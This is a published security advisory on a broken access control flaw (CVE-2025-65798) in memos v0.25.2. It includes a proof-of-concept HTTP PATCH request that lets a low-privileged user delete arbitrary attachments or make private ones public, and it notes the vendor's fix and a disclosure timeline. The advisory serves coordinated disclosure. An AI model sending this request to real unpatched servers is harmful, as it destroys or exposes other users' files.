usd-2025-59 | Broken Access Control in Memo Attachments

Product: memos
Affected Version: v0.25.2
Vulnerability Type: CWE-862: Missing Authorization
Security Risk: Medium
Vendor: usememos
Vendor URL: https://github.com/usememos/memos
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-65798
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-65798
Advisory ID: usd-2025-59

Description

Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth/SSO integration, activity logging, and internationalization.

When updating which attachments are assigned to a Memo, neither the creator of the Memo nor the creator of the attachment are validated. An authenticated, low-privileged attacker can use this vulnerability to delete arbitrary attachments or make private attachments public.

Proof of Concept

The following HTTP request can be used by low-privileged users with arbitrary Memo and attachment IDs. Note that only IDs of public Memos and Attachments are attached to public Memos are discoverable.

PATCH /api/v1/memos/ff6FyXzix9d8QyUQGvig3Q/attachments HTTP/1.1
Host: memos:5230
Content-Type: application/json
Cookie: user_session=3-3a[... REDACTED ...]79
Content-Length: 133

{
    "name": "memos/ff6FyXzix9d8QyUQGvig3Q",
    "attachments": [
        {
            "name": "attachments/QLjAxtsxnHTigoQYsaixSv"
        }
    ]
}

If the attachments list is empty, arbitrary attachments can be removed. Note that these are also deleted from disk when they are unassigned from a Memo.

In a different scenario, if an attacker discovers an inaccessible attachment ID, they can assign the Attachment to a public Memo, making the previously inaccessible Attachment public.

Fix

Fixes for all mentioned vulnerabilities have been submitted as pull request.

References

• https://owasp.org/www-community/Broken_Access_Control

Timeline

• 2025-11-03: First contact request
• 2025-11-04: Pull request submitted
• 2025-11-06: Commit merged to main by vendor
• 2025-11-25: Version 0.25.3 was released
• 2025-12-03: This advisory is published

Credits

This security vulnerability was identified by Florian Dewald of usd AG.